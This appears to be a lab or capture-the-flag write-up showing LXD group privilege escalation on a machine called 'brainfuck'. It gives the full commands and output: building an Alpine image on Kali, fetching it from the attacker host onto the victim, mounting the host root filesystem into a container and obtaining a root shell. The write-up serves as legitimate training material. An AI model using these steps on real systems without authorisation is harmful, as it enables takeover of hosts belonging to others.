lxd group privilege escalation Link to heading
Scanrio: As per checking the user privilege , there is one thing which can help us escalating the privilege.User belong lxd group Link to heading
orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)
There are some exploits which shows the lxd privileges can be escalated.
On Kali machine: Link to heading
Download and build the alpine image
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine 130 ⨯
--2022-04-13 21:18:47-- http://wget/
Resolving wget (wget)... failed: Name or service not known.
wget: unable to resolve host address ‘wget’
--2022-04-13 21:18:47-- https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8060 (7.9K) [text/plain]
Saving to: ‘build-alpine.1’
build-alpine.1 100%[========================================================================================>] 7.87K --.-KB/s in 0s
2022-04-13 21:18:48 (71.7 MB/s) - ‘build-alpine.1’ saved [8060/8060]
FINISHED --2022-04-13 21:18:48--
Total wall clock time: 0.6s
Downloaded: 1 files, 7.9K in 0s (71.7 MB/s)
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ sudo bash build-alpine 4 ⨯
Determining the latest release... v3.15
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.15/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.12.7-r3.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub: OK
Verified OK
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2575 100 2575 0 0 403 0 0:00:06 0:00:06 --:--:-- 481
--2022-04-13 21:19:35-- http://alpine.mirror.wearetriple.com/MIRRORS.txt
Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.106, 2a00:1f00:dc06:10::106
Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.106|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2575 (2.5K) [text/plain]
Saving to: ‘/home/rocky/hckbox/brainfuck/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’
/home/rocky/hckbox/brainfuck/rootfs/usr/sh 100%[========================================================================================>] 2.51K --.-KB/s in 0s
2022-04-13 21:19:36 (317 MB/s) - ‘/home/rocky/hckbox/brainfuck/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [2575/2575]
Selecting mirror http://mirrors.tuna.tsinghua.edu.cn/alpine//v3.15/main
fetch http://mirrors.tuna.tsinghua.edu.cn/alpine//v3.15/main/x86_64/APKINDEX.tar.gz
(1/20) Installing musl (1.2.2-r7)
(2/20) Installing busybox (1.34.1-r5)
Executing busybox-1.34.1-r5.post-install
(3/20) Installing alpine-baselayout (3.2.0-r18)
Executing alpine-baselayout-3.2.0-r18.pre-install
Executing alpine-baselayout-3.2.0-r18.post-install
(4/20) Installing ifupdown-ng (0.11.3-r0)
(5/20) Installing openrc (0.44.7-r5)
Executing openrc-0.44.7-r5.post-install
(6/20) Installing alpine-conf (3.13.1-r0)
(7/20) Installing ca-certificates-bundle (20211220-r0)
(8/20) Installing libcrypto1.1 (1.1.1n-r0)
(9/20) Installing libssl1.1 (1.1.1n-r0)
(10/20) Installing libretls (3.3.4-r3)
(11/20) Installing ssl_client (1.34.1-r5)
(12/20) Installing zlib (1.2.12-r0)
(13/20) Installing apk-tools (2.12.7-r3)
(14/20) Installing busybox-suid (1.34.1-r5)
(15/20) Installing busybox-initscripts (4.0-r5)
Executing busybox-initscripts-4.0-r5.post-install
(16/20) Installing scanelf (1.3.3-r0)
(17/20) Installing musl-utils (1.2.2-r7)
(18/20) Installing libc-utils (0.7.2-r3)
(19/20) Installing alpine-keys (2.4-r1)
(20/20) Installing alpine-base (3.15.4-r0)
Executing busybox-1.34.1-r5.trigger
OK: 9 MiB in 20 packages
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ ls
40939.txt alltcp.txt alpine-v3.15-x86_64-20220413_2119.tar.gz
On Victim machine: Link to heading
Copy the tar.gz file( alpine image) to victim machine
import a image for lxd
initialize image
mount the container to /root
cd /tmp
orestis@brainfuck:/tmp$ wget http://10.10.14.5/alpine-v3.15-x86_64-20220413_2119.tar.gz
--2022-04-14 04:34:30-- http://10.10.14.5/alpine-v3.15-x86_64-20220413_2119.tar.gz
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3241097 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.15-x86_64-20220413_2119.tar.gz’
alpine-v3.15-x86_64-20220413_2119.tar.gz 100%[========================================================================================>] 3.09M 3.69MB/s in 0.8s
2022-04-14 04:34:31 (3.69 MB/s) - ‘alpine-v3.15-x86_64-20220413_2119.tar.gz’ saved [3241097/3241097]
orestis@brainfuck:/tmp$ lxc image import ./alpine-v3.15-x86_64-20220411_1049.tar.gz --alias newimage
error: open ./alpine-v3.15-x86_64-20220411_1049.tar.gz: no such file or directory
orestis@brainfuck:/tmp$ lxc image import ./alpine-v3.15-x86_64-20220413_2119.tar.gz --alias newimage
Image imported with fingerprint: c87829dd35ed7e40f0fed6a050e22df61eeefa31b86327e368782d37fe4a7bf1
orestis@brainfuck:/tmp$ lxc image list
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| alpine | 3d89962ff185 | no | alpine v3.15 (20220411_10:49) | x86_64 | 3.09MB | Apr 11, 2022 at 3:06pm (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| newimage | c87829dd35ed | no | alpine v3.15 (20220413_21:19) | x86_64 | 3.09MB | Apr 14, 2022 at 1:35am (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
orestis@brainfuck:/tmp$
initialize image
orestis@brainfuck:/tmp$ lxc config device add rchitect mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to rchitect
orestis@brainfuck:/tmp$ lxc start rchitect
orestis@brainfuck:/tmp$ lxc exec rchitect /bin/sh
~ # whomai
/bin/sh: whomai: not found
~ # whoami
root
~ # id
uid=0(root) gid=0(root)
~ #